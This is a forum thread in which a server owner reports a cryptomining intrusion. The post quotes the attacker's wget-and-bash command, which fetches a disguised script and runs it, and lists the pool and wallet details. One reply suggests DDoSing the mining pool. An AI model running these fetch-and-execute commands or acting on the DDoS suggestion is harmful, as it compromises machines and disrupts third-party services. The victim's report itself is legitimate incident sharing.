全球主机交流论坛

标题: 利用xmrig挖矿的狗 逼能不能治一治它? [打印本页]
作者: laogui    时间: 2020-11-25 03:32
标题: 利用xmrig挖矿的狗 逼能不能治一治它?
本帖最后由 laogui 于 2020-11-25 03:35 编辑

RT
有一台吃灰的阿里云机,被人入侵了,利用xmrig挖矿
幸亏阿里云有提醒
这狗 逼执行的命令代码:
  1. wget http://iems.net.cn/file/4.jpg -O /tmp/4.sh && bash /tmp/4.sh 123
复制代码
  1. wget http://iems.net.cn/file/config.jpg -O /root/moneroocean/config.json
复制代码

看了shell脚本和config.json文件,得到以下内容
矿池:gulf.moneroocean.stream
账号:48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF
密码:123


有没有办法治一治这种狗 逼的?



作者: tir    时间: 2020-11-25 04:30
不知道,不太懂挖矿
作者: 铅笔    时间: 2020-11-25 04:38
社工他github地址呗
作者: 栉风沐雨    时间: 2020-11-25 05:05
这个真治不了。。。除了你能追溯到他个人电脑了!

这玩意,矿池是公开的,钱包公钥你知道没卵用,也不知道谁的!

直接D他矿池吧,D死矿池,就出不来块,LOC大神多!
作者: byg    时间: 2020-11-25 07:44
提示: 作者被禁止或删除 内容自动屏蔽



欢迎光临 全球主机交流论坛 (https://443502.xyz/) Powered by Discuz! X3.4